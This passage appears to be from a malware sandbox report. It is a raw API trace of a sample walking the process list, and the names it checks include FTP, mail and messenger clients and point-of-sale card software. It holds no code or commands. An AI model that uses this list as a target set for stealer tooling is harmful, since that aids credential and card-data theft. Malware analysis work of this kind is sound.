lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.289] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0259.333] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0259.334] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0259.336] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0259.338] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0259.339] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0259.341] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.342] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0259.344] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0259.345] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0259.347] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0259.349] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.350] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0259.351] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0259.353] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0259.354] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0259.356] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0259.359] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0259.360] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0259.362] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0259.363] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0259.364] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0259.366] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0259.368] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0259.410] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0259.414] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0259.416] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0259.417] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0259.419] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0259.420] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0259.422] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0259.423] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0259.425] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0259.426] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0259.428] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0259.430] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0259.432] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0259.435] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0259.437] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0259.439] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0259.441] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0259.443] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0259.445] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0259.447] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0259.489] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0259.492] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0259.494] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0259.495] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0259.497] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0259.499] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0259.501] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0259.503] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0259.505] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0259.507] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0259.511] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0259.513] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0259.515] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0259.517] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0259.519] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0259.520] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0259.522] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0259.525] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0259.567] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0259.569] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0259.571] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0259.573] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0259.574] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0259.576] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0259.578] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0259.582] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0259.584] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0259.585] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0259.587] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0259.589] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0259.591] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0259.593] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0259.594] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0259.596] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0259.598] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0259.600] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0259.602] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0259.603] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0259.676] 